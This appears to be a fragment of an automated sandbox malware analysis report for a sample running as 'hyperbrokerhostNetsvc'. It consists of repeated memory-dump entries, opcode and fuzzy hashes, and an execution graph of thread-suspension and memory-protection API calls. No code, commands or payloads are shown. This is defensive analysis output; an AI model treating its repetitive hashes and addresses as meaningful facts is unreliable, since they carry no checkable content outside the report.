                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        • Instruction ID: ad59fabf50f93c4a0f8bcaf7d24f89d09473c97b65b313a8256b2651c6acc9a7
                                                                                        • Opcode Fuzzy Hash: 9d0f457aff82c01053cf6b6cf4da7d9e957982bc8f859f7dadd3ba484a45c132
                                                                                        • Instruction Fuzzy Hash: 1A01DA70E4A21E8FEB649B54C864BA8B6B1BB45304F5151F9C10DA3291CBB81E81CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7decd28ce71652d2a9d20727db81c7ae862da8bc230e6fbcecd8a058351480ca
                                                                                        • Instruction ID: ccb7e0b238b5b385697011d120585da4513efd92c3af2cd9603297c296ea2153
                                                                                        • Opcode Fuzzy Hash: 7decd28ce71652d2a9d20727db81c7ae862da8bc230e6fbcecd8a058351480ca
                                                                                        • Instruction Fuzzy Hash: 30F01C3091594E9FEF90EF68C8596EE7BE1FF28304F014476E81CD21A0DA70A6A4CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 250f997dd2043885595aa07f0877d926764ed275398d9685807a533dbefdf616
                                                                                        • Instruction ID: b1fca14918d88fbf616c4a1b88067fc5a25c7a646c44cb22c698c5a940f5c5d7
                                                                                        • Opcode Fuzzy Hash: 250f997dd2043885595aa07f0877d926764ed275398d9685807a533dbefdf616
                                                                                        • Instruction Fuzzy Hash: 6DF01534508A4ECFCB94EF58C844AAA77A0FF18305F010165E42DC3265D7B4EAA4CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e32ab13edfb55ee2ed64bfff5134ead64e4e9bd939a6b870fcbca5548bb4200b
                                                                                        • Instruction ID: 2a835837263c7312e4ecb6f0ced47c99f55cd8849ec86688ee60c36db4190eb0
                                                                                        • Opcode Fuzzy Hash: e32ab13edfb55ee2ed64bfff5134ead64e4e9bd939a6b870fcbca5548bb4200b
                                                                                        • Instruction Fuzzy Hash: 4AF03034A1950DEBDB74EFA8D921AEEB7A0FF04308F010175F41D87195CA34A655CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c27b848947ec43522ae1085487992a0e8c959bf5be68c7496314e839d4e810f
                                                                                        • Instruction ID: f33dcfb59e462f7981c675cab465914186c03f74f5842b8ffbac2f5cf67bc7a6
                                                                                        • Opcode Fuzzy Hash: 7c27b848947ec43522ae1085487992a0e8c959bf5be68c7496314e839d4e810f
                                                                                        • Instruction Fuzzy Hash: 23E04F3050650ECFDB54EF54D9412EA77A0FF58304F014525E41DC3195DA74A664CBC1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fb14195e00888b3146fecc3e2170b3f86ca9ccf97a290cfb67f59280aecc0d6
                                                                                        • Instruction ID: 27e53e2085724a0161e10a8937e9dd947e53ffb2c7f59e975b0e1239aadb3f0f
                                                                                        • Opcode Fuzzy Hash: 3fb14195e00888b3146fecc3e2170b3f86ca9ccf97a290cfb67f59280aecc0d6
                                                                                        • Instruction Fuzzy Hash: F3E05270E0962D8EEBB0DF5488A87A9B7F1EB15304F1151E6D00DA21A0CEB82BC0DF11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 05f4b742874c58cae17708e6eb230f0e1628adfeb8f0dfcd482d1cc805bd7781
                                                                                        • Instruction ID: e323e5ae9af81a3f0bb1935a8748fa76055ed9d5619ac1b3f82633d5f17fb46f
                                                                                        • Opcode Fuzzy Hash: 05f4b742874c58cae17708e6eb230f0e1628adfeb8f0dfcd482d1cc805bd7781
                                                                                        • Instruction Fuzzy Hash: D4D0C922F1C80B97E57A92E8883457C10E1AF68381FB44535E42EE32C1CC6DB882228D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c62ed30f388596b2a76af928336bdb9dc9505f0f6ac063da27cadaa35c0e4818
                                                                                        • Instruction ID: 00742d083d66521a3e6a2d5b9379794196d646541e2ed30426fad362e91f9fa5
                                                                                        • Opcode Fuzzy Hash: c62ed30f388596b2a76af928336bdb9dc9505f0f6ac063da27cadaa35c0e4818
                                                                                        • Instruction Fuzzy Hash: 8D31F670E08A1D8FCF94DF98D491AEDBBF1FB69300F20516AE019E3291D635AA41CB44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:5.7%
                                                                                        Dynamic/Decrypted Code Coverage:83.3%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:18
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 53801 7ffd9bc4c1bd 53802 7ffd9bc4c1cb SuspendThread 53801->53802 53804 7ffd9bc4c2a4 53802->53804 53805 7ffd9bc4d960 53806 7ffd9bc4d99b ResumeThread 53805->53806 53808 7ffd9bc4da74 53806->53808 53809 7ffd9bc4dac9 53810 7ffd9bc4dad7 FindCloseChangeNotification 53809->53810 53812 7ffd9bc4dbb4 53810->53812 53797 7ffd9bab316d 53798 7ffd9bab318f VirtualAlloc 53797->53798 53800 7ffd9bab32a5 53798->53800 53793 7ffd9bab177e 53794 7ffd9bab178d VirtualProtect 53793->53794 53796 7ffd9bab18cd 53794->53796 53789 7ffd9bc4f7e5 53790 7ffd9bc4f7ff GetFileAttributesW 53789->53790 53792 7ffd9bc4f8c5 53790->53792

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _$mX_H
                                                                                        • API String ID: 0-2526825130
                                                                                        • Opcode ID: f6cdf2afb327415a40768437da99f4fc72e94502bf8fb5b9aeaa3af1528c7b35
                                                                                        • Instruction ID: 4e263f967199276b6e7b9e57c82f89dc2508acab28b3700c5f2d22e582cef92c
                                                                                        • Opcode Fuzzy Hash: f6cdf2afb327415a40768437da99f4fc72e94502bf8fb5b9aeaa3af1528c7b35
                                                                                        • Instruction Fuzzy Hash: 71030E70E0992D8FEBA8DB58C8A5BA8B7B1FF58310F1441E9D05DD7292DA746E81CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baad000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 7N_H$|qZ
                                                                                        • API String ID: 0-2757564041
                                                                                        • Opcode ID: c77854470256672357ab42a2d1fa7287e4d6b20f12cb6f37b3ff676e2c44e9eb
                                                                                        • Instruction ID: c117a64434f8177c1ec660454f5908bfc90cd191ee978bb87577f89ef8bca15a
                                                                                        • Opcode Fuzzy Hash: c77854470256672357ab42a2d1fa7287e4d6b20f12cb6f37b3ff676e2c44e9eb
                                                                                        • Instruction Fuzzy Hash: 3DB2C570E0961D8FDBA8DB58C8A5AACB7B2FF58304F1041A9D00DE7295DB75AE81CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce5c60e28af74623ed1fd84a927aedce8b187db04775f664c6bf89385df82851
                                                                                        • Instruction ID: bbf50d44f398eb4b7fbc6605e484f91e1629c3a512e81693304203d540ba44cc
                                                                                        • Opcode Fuzzy Hash: ce5c60e28af74623ed1fd84a927aedce8b187db04775f664c6bf89385df82851
                                                                                        • Instruction Fuzzy Hash: 44522370A0992D8FEFA8DB58C895BA9B7B1FF54300F1442E9D05DD3296DE356A81CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baa0000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ccec413865978a5fe07535bc2874d2b152e1410d5561d7869b5ab6e4b7d7ee97
                                                                                        • Instruction ID: 47af69c29257b92f46e95e10fadef0adeb451dbd330093dfce2bfb17e9ea5b29
                                                                                        • Opcode Fuzzy Hash: ccec413865978a5fe07535bc2874d2b152e1410d5561d7869b5ab6e4b7d7ee97
                                                                                        • Instruction Fuzzy Hash: EBA1CDB1A1994D8FE7A9DF68C8657AD7BE1EF99310F00017ED00DD72D6CAB82805C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 083e7aa17ff852b727e99a8e9f255da9c75b5039b8994616d4e779efdcec339c
                                                                                        • Instruction ID: 6912469278bfe71fef8226f856f9aff2db89d7d7719de24e4f5b64af8a771f2f
                                                                                        • Opcode Fuzzy Hash: 083e7aa17ff852b727e99a8e9f255da9c75b5039b8994616d4e779efdcec339c
                                                                                        • Instruction Fuzzy Hash: 35517CB180E7C98FC7539BB488755913FF1AF13204B0A48DBC4C5CF5A3E668995AC762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $i0_H
                                                                                        • API String ID: 0-2773416049
                                                                                        • Opcode ID: 32bd8a37c3d6413e6f708abaca74ae5ba5b14d42f18f0e7fea0112d5c3b9cfc7
                                                                                        • Instruction ID: 52be40522ba8a6ef24ffed9d634d82f981c0dbcc7b21e4dcf0d7be57c1f9f165
                                                                                        • Opcode Fuzzy Hash: 32bd8a37c3d6413e6f708abaca74ae5ba5b14d42f18f0e7fea0112d5c3b9cfc7
                                                                                        • Instruction Fuzzy Hash: 51517F71E0990E8FDB59DBE8C4A15FDB7B1EF58304F1141BAD01AE72A6CA396901CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 911 7ffd9bab177e-7ffd9bab178b 912 7ffd9bab1796-7ffd9bab17a7 911->912 913 7ffd9bab178d-7ffd9bab1795 911->913 914 7ffd9bab17a9-7ffd9bab17b1 912->914 915 7ffd9bab17b2-7ffd9bab18cb VirtualProtect 912->915 913->912 914->915 919 7ffd9bab18cd 915->919 920 7ffd9bab18d3-7ffd9bab1923 915->920 919->920
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab1000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 283d7c9b53ffa1af5ee343f31b438050f8e22a6770180aceeef6d08cd64fa8ec
                                                                                        • Instruction ID: 5cb2afb80061cb3d74f8c451243014d405b652f6f6e86adf92cb0f4b1e7a5fe0
                                                                                        • Opcode Fuzzy Hash: 283d7c9b53ffa1af5ee343f31b438050f8e22a6770180aceeef6d08cd64fa8ec
                                                                                        • Instruction Fuzzy Hash: 4A515830D0964D8FDB54DFA8C885AE9BBF1FB6A310F1042AAD449E3251DB74A885CF80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 923 7ffd9bc4d960-7ffd9bc4d999 924 7ffd9bc4d99b 923->924 925 7ffd9bc4d99c-7ffd9bc4da72 ResumeThread 923->925 924->925 929 7ffd9bc4da74 925->929 930 7ffd9bc4da7a-7ffd9bc4dac4 925->930 929->930
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction ID: 8953c6acf4c6b5c657014f712f050e19992a39b971c0d023e57ef1e5f26aea37
                                                                                        • Opcode Fuzzy Hash: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction Fuzzy Hash: 06517A7090C78C8FDB59EFA8D894BE9BBF0EF56310F1441ABD049DB292DA749946CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1025 7ffd9bc4dac9-7ffd9bc4dad5 1026 7ffd9bc4dae0-7ffd9bc4dae9 1025->1026 1027 7ffd9bc4dad7-7ffd9bc4dada 1025->1027 1028 7ffd9bc4dadc-7ffd9bc4dadf 1026->1028 1029 7ffd9bc4daeb-7ffd9bc4dbb2 FindCloseChangeNotification 1026->1029 1027->1028 1028->1026 1033 7ffd9bc4dbb4 1029->1033 1034 7ffd9bc4dbba-7ffd9bc4dc0e 1029->1034 1033->1034
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID:
                                                                                        • API String ID: 2591292051-0
                                                                                        • Opcode ID: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction ID: f4d0ee3fc29203a6211fdc554c692196c7f81efa6443b278c31774e8c7c0c3a6
                                                                                        • Opcode Fuzzy Hash: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction Fuzzy Hash: 8B415B30E0865C8FDB58DFA8D895BEDBBF0FF5A310F1041AAD049D7292DA74A985CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1037 7ffd9bc4c1bd-7ffd9bc4c1c9 1038 7ffd9bc4c1d4-7ffd9bc4c2a2 SuspendThread 1037->1038 1039 7ffd9bc4c1cb-7ffd9bc4c1d3 1037->1039 1043 7ffd9bc4c2a4 1038->1043 1044 7ffd9bc4c2aa-7ffd9bc4c2f4 1038->1044 1039->1038 1043->1044
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: SuspendThread
                                                                                        • String ID:
                                                                                        • API String ID: 3178671153-0
                                                                                        • Opcode ID: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction ID: 6e5fd9f0944486eee5cdb762805af6cfe4d60633fc1fbfc8cb599d84a2e5bdac
                                                                                        • Opcode Fuzzy Hash: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction Fuzzy Hash: 86414970E0864C8FDB98DFA8C895AEDBBF0FF5A311F10416AD449E7292DA71A945CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1047 7ffd9bc4f7e5-7ffd9bc4f8c3 GetFileAttributesW 1051 7ffd9bc4f8cb-7ffd9bc4f909 1047->1051 1052 7ffd9bc4f8c5 1047->1052 1052->1051
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 4e29f00dc868080c2c680eec322fec27ab13ab442d5ac1b920b0fd6deb4c36b7
                                                                                        • Instruction ID: da0488c7f50dfdf8f511e59f44e874cce6e4c072f6070399684a18427090669b
                                                                                        • Opcode Fuzzy Hash: 4e29f00dc868080c2c680eec322fec27ab13ab442d5ac1b920b0fd6deb4c36b7
                                                                                        • Instruction Fuzzy Hash: E6410870E08A4C8FDB98DF98D895BEDBBF1FB5A310F10416ED049E7252DA70A845CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: x0_H
                                                                                        • API String ID: 0-4001381062
                                                                                        • Opcode ID: 08fbc6458052814a9b3fbbb90e65fde2a0026cb5ae9de93169729655939710da
                                                                                        • Instruction ID: 1884727815b689f7fffecf3cb110469fb71e5a98c309da41866511e2c135eb0d
                                                                                        • Opcode Fuzzy Hash: 08fbc6458052814a9b3fbbb90e65fde2a0026cb5ae9de93169729655939710da
                                                                                        • Instruction Fuzzy Hash: 8DB12231B0EE4E4FE3789B7884655BA7BE1EF55311B16017FE08AC71B2DE39A9028741
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
